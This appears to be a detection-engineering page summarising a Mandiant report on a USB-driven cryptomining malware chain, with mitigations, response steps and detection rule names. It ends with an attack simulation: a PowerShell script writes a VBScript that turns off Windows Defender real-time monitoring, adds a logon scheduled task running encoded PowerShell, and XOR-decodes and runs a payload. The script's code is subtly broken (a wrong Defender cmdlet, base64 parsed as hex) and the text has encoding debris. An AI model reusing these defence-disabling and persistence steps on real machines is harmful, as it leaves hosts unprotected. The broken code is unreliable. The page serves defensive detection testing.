Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report details a USB-driven infection campaign that leverages malicious shortcut files to deliver a multi-stage malware chain for cryptocurrency mining. Initial execution side-loads a DLL named printui.dll from a fake System32 directory, then hands off to a dropper (CUTFAIL), further deploying a downloader (HIGHREPS) and a backdoor (PUMPBENCH). The PUMPBENCH backdoor communicates with a PostgreSQL server to fetch additional payloads and ultimately launches XMRig miners. The operation maintains persistence through Windows Defender exclusions, scheduled tasks, and rogue services.
Analysis
Mandiant researchers deconstructed the kill chain and highlighted four core malware families: DIRTYBULK, CUTFAIL, HIGHREPS, and PUMPBENCH. They captured the actors’ file naming patterns, the DLL side-loading abuse of printui.dll, registry changes, and associated network indicators. The analysis also charted persistence techniques, including scheduled tasks and services linked to the DCOMLaunch Service Group.
Mitigation
Recommended defenses include blocking execution of shortcut files originating from removable media, monitoring for commands that add Windows Defender exclusions, detecting suspicious printui.dll side-loading activity, and hunting for services or scheduled tasks that use random six-digit names. Applying network controls against known malicious domains and DoH resolvers can further limit command-and-control channels.
Response
Once detected, isolate the impacted host, remove the malicious DLL and related components, delete the offensive scheduled task and service entries, and restore Windows Defender settings by clearing exclusions. Perform comprehensive forensic scanning to uncover residual payloads and track connections to the identified PostgreSQL C2 infrastructure. Finally, update detection content to cover the observed command-line usage and file creation behaviors.
Attack Flow
Detections
Abnormal Space Count in Process Name / Command Line / File Path (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Defender Exclusions Modification (via cmdline)
View
Possible Copy and Rename System Executable for Evasion (via cmdline)
View
Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
-
Stage 1 – Drop malicious VBScript on the compromised USB drive (e.g.,Â
E:\payload.vbs). The script disables Windows Defender real‑time protection usingÂAdd‑MpPreference, encrypts a payload with an XOR routine, and creates a scheduled task for persistence. -
Stage 2 – Execute the script viaÂ
wscript.exe passing the persistence command line directly (to satisfy the rule’s conjunctive condition). -
Stage 3 – The script internally invokes PowerShell to run the encrypted payload, demonstrating the “infection chain”.
-
Stage 4 – After execution, the attacker cleans up artifacts (removes the script, deletes the scheduled task).
-
-
Regression Test Script:
# ------------------------------------------------------------ # Regression Test – Malware Infection Chain Simulation # ------------------------------------------------------------ $scriptPath = "$env:TEMP\payload.vbs" $taskName = "WinUpdateTask" $xorKey = 0x5A # -- 1. Create XOR‑encrypted dummy payload -------------------------------- $plainPayload = "calc.exe" $bytes = [System.Text.Encoding]::Unicode.GetBytes($plainPayload) for ($i = 0; $i -lt $bytes.Length; $i++) { $bytes[$i] = $bytes[$i] -bxor $xorKey } $encrypted = [Convert]::ToBase64String($bytes) # -- 2. Write malicious VBScript ------------------------------------------- @" ' Malicious VBScript – infection chain Set sh = CreateObject("WScript.Shell") ' Disable real‑time protection sh.Run "powershell -Command `"Add-MpPreference -DisableRealtimeMonitoring $true`"", 0, True ' Create scheduled task for persistence sh.Run "schtasks /Create /SC ONLOGON /TN $taskName /TR `"powershell -EncodedCommand $([Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Start-Process `"$env:windir\system32\cmd.exe`" /c echo $encrypted ^| powershell -EncodedCommand'))`"", 0, True ' Decrypt and execute payload Dim encData, decData, i encData = "$encrypted" decData = "" For i = 1 To Len(encData) Step 4 ch = ChrW(CInt("&H" & Mid(encData, i, 4)) Xor $xorKey) decData = decData & ch Next sh.Run decData, 0, False "@ | Set-Content -Encoding ASCII $scriptPath # -- 3. Execute the script via wscript.exe (triggers the rule) ------------- wscript.exe "$scriptPath" /B # -- 4. (Optional) Wait a few seconds for the task to fire ---------------- Start-Sleep -Seconds 10 # ------------------------------------------------------------ # Cleanup – remove script and scheduled task # ------------------------------------------------------------ Remove-Item $scriptPath -Force schtasks /Delete /TN $taskName /F -
Cleanup Commands:
# Remove residual scheduled task (if still present) schtasks /Delete /TN "WinUpdateTask" /F # Remove any lingering script files Remove-Item "$env:TEMP\payload.vbs" -ErrorAction SilentlyContinue # Re‑enable real‑time protection powershell -Command "Add-MpPreference -DisableRealtimeMonitoring $false"